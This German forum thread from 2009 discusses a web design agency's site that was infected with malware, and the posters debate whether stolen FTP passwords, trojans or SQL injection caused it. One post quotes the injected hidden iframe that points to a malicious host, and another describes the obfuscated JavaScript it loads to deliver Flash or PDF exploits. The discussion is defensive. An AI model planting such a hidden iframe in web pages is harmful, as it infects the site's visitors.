Webdesign aus Osteuropa

QUOTE (PH @ Sa 13.06.2009, 18:16) Kann ich nicht bestätigen - ich habe Avast und Threatfire laufen.
Welche software gab bei Dir die Meldung?

bei dem Test PC habe ich Antivir AVIRA - immer letztes Update...
Meldung s. Bild Anhang.
Etwas im Flash Script eingebaut?... SWF lade natürlich nicht runter auch wenn Test PC... :) ...
ph34r.gif
Anhang anzeigen 2

 
Der Arme wurde durch einen vergifteten iframe verseucht.

CODE <iframe src="http://shopfilmlifeforce.cn:8080/index.php" width=188 height=121 style="visibility: hidden"></iframe>


Ich habe ihn benachrichtigt.


Das kann euch übrigens allen passieren!!!

Ein FTP Passwort ist schnell geknackt, es ist mir auch passiert - genau das gleiche!

Meins war 8 Zeichen lang, mit einer Zahl und einem Sonderzeichen!

Vielleicht wurde auch proftpd geknackt, wer weiss?

Mein Server steht eh kurz vor der Ablösung, also habe ich einfach alle eingehenden FTP-Verbindungen auf meine IP beschränkt. Dann kehrte Ruhe ein.

Sichert eure Server ab!


P.S.
Das verseuchte Iframe wurde mir nicht gemeldet, weil Threatfire dem schon früher begegnet war, und das Ding einfach stillschweigend blockiert hat. :))
 
QUOTE (PH @ Sa 13.06.2009, 17:56)Das kann euch übrigens allen passieren!!!

Ein FTP Passwort ist schnell geknackt, es ist mir auch passiert - genau das gleiche!

Dazu muß kein FTP-Passwort geknackt werden.

Das wäre sogar ein extrem aufwendiger Hack, weil sich dann eine andere Instanz erst die Startseite holen, den Code einfügen und das ganze per FTP wieder hochladen müßte.

Das sind typische Sql- o.ä. -Injektionen, die dadurch generiert werden, daß über einen Hack Code irgendwo direkt in eine Tabelle eingeschleust wird, der dann halt auch irgendwo rauskommt.

Hier ist die Stelle eigentlich völliger Quatsch:


QUOTE <body class="rand" onselectstart="return true" ondragstart="return false" oncontextmenu="return true" oncontext="return false"<iframe ... ></iframe>>


also mitten im body-Element ein iframe eingehängt. Die zwei '>>' sind original.

Das kann aber auch ein Attribut sein, das aus der Datenbank bestückt wird - und genau diese Zelle wurde zufällig getroffen.

Im Prinzip ist das so etwas: SQL-Injection - automatisierte Angriffe
 
Jürgen, ich habe die FTP-Verbindungen in meinen Logs gesehen.
(Und chkrootkit hat nichts gefunden!!)

Die Typen kamen über verschiedene IPs (wahrscheinlich geknackte Zombies) per FTP rein.

Aber ich glaube an einen gescripteten Angriff, weil die Stellen, an denen der Code eingetragen wurde eben Teilweise keinen Sinn ergab.

Das Script unterschied aber sehr wohl zwischen HTML und PHP, denn in meinen PHP Dateinen war noch ein echo Befehl dabei (alle Dateien, die "index" oder "main" im Namen hatten, wurden infiziert).

Ausserdem kommen die Stellen, wo der code eingetragen wurde, nicht aus einer Datenbank, sondern aus statischen Templates...
Und der Dateiänderungszeitpunkt wurde auch durch das System festgehalten.


Ich glaube vielmehr, dass die Jungs FTP Passwörter knacken, und wohl auch Trojaner im Umlauf haben, die die Passwörter ausspionieren.

Mein PC wurde mit einer Art zero-Day Trojaner Exploit infiziert (trotz aktuellem Avira!!!), und daher hatten die wahrscheinlich das Passwort.
 
QUOTE (PH @ Sa 13.06.2009, 18:23)Jürgen, ich habe die FTP-Verbindungen in meinen Logs gesehen.
(Und chkrootkit hat nichts gefunden!!)


Das mag in deinem Fall korrekt sein. Aber was im einen Fall die Ursache (und dank Protokoll relativ eindeutig) ist, muß im anderen Fall noch nicht gelten. Technisch lassen sich solche Hacks auch per Sql-Injektionen durchführen - und dann ist ein Entfernen des Schadcodes und ein Ändern des FTP-Passworts völlig wirkungslos.

Ich habe mir den Code vorhin mal mit meinem Download.exe runtergeladen. Das ist ziemlich tricky, da wird ein mehrfach verschlüsselter JavaScript-Code ausgeführt, der versucht, entweder ein Flash oder ein PDF nachzuladen. Zu beiden gibt es relativ kritische Bugs, für die es (wenn ich das richtig in Erinnerung habe), erst seit ein paar Tagen einen Patch gibt.

Merkwürdig ist, daß beim zweiten Versuch, den Code abzurufen, nichts mehr zurückgegeben wird - die merken sich also die IPs oder die UserAgenten. Klar - der Erstaufruf soll ja infizieren.



QUOTE (PH @ Sa 13.06.2009, 18:23)Mein PC wurde mit einer Art zero-Day Trojaner Exploit infiziert (trotz aktuellem Avira!!!), und daher hatten die wahrscheinlich das Passwort.


Die Frage ist bloß, was da zuerst war: Ist das FTP-Passwort per BruteForce gehackt worden und hast Du dir dann durch den Aufruf deiner eigenen Seite den Bug eingehandelt oder wurde dein lokaler PC zuerst, dann deine Website infiziert? Diese in den letzten Wochen / Monaten aufgetauchten Adobe-Bugs sind ziemlich heftig und ermöglichen es, den lokalen PC stark zu infizieren.

Im Prinzip sind auch Fälle denkbar, wo per Sql-Injektion ein neuer FTP-Dienst generiert werden kann, über den dann gearbeitet wird.


Ansonsten läßt mich bei Server-Daten mal wieder die dezidierte Firewall ruhig schlafen - die FTP-Ports sind von außen her nicht zugänglich.
 
QUOTE Die Frage ist bloß, was da zuerst war: Ist das FTP-Passwort per BruteForce gehackt worden und hast Du dir dann durch den Aufruf deiner eigenen Seite den Bug eingehandelt oder wurde dein lokaler PC zuerst, dann deine Website infiziert? Diese in den letzten Wochen / Monaten aufgetauchten Adobe-Bugs sind ziemlich heftig und ermöglichen es, den lokalen PC stark zu infizieren.


Mein PC war so stark infiziert, dass ich ihn neu aufsetzen musste.
Die Viren haben die Ausführung von Säuberungsmassnahmen einfach blockiert.

An dem Tag hatte ich auf 2 Webseiten gearbeitet, und diese wurden dann auch infiziert.
Ich tippe also darauf, dass die Passwörter durch den Trojaner ausgespäht wurden.
 
Hallo zusammen

Ich habe ArtOfWork diesbezüglich noch kontaktiert, und es war nach bisherigen Erkenntnissen tatsächlich so, dass das FTP-Passwort vermutlich "geknackt" wurde. Dieses wurde nun selbstverständlich geändert und bis jetzt gab es angeblich keine weiteren Probleme.

Ich hoffe, mit dem Link niemanden geschadet zu haben. War natürlich in keinster Weise Absicht oder etwas in der Art. Trotzdem handelt es sich hier um einen guten Anbieter
smile.gif
... dummes Timing.
 
Die Passwörter werden nicht einfach "geknackt", sondern von Trojanern ausgespäht...


Wenn nur die Passwörter geändert wurden, kommt das Problem irgendwann zurück.

 
Zurück
Oben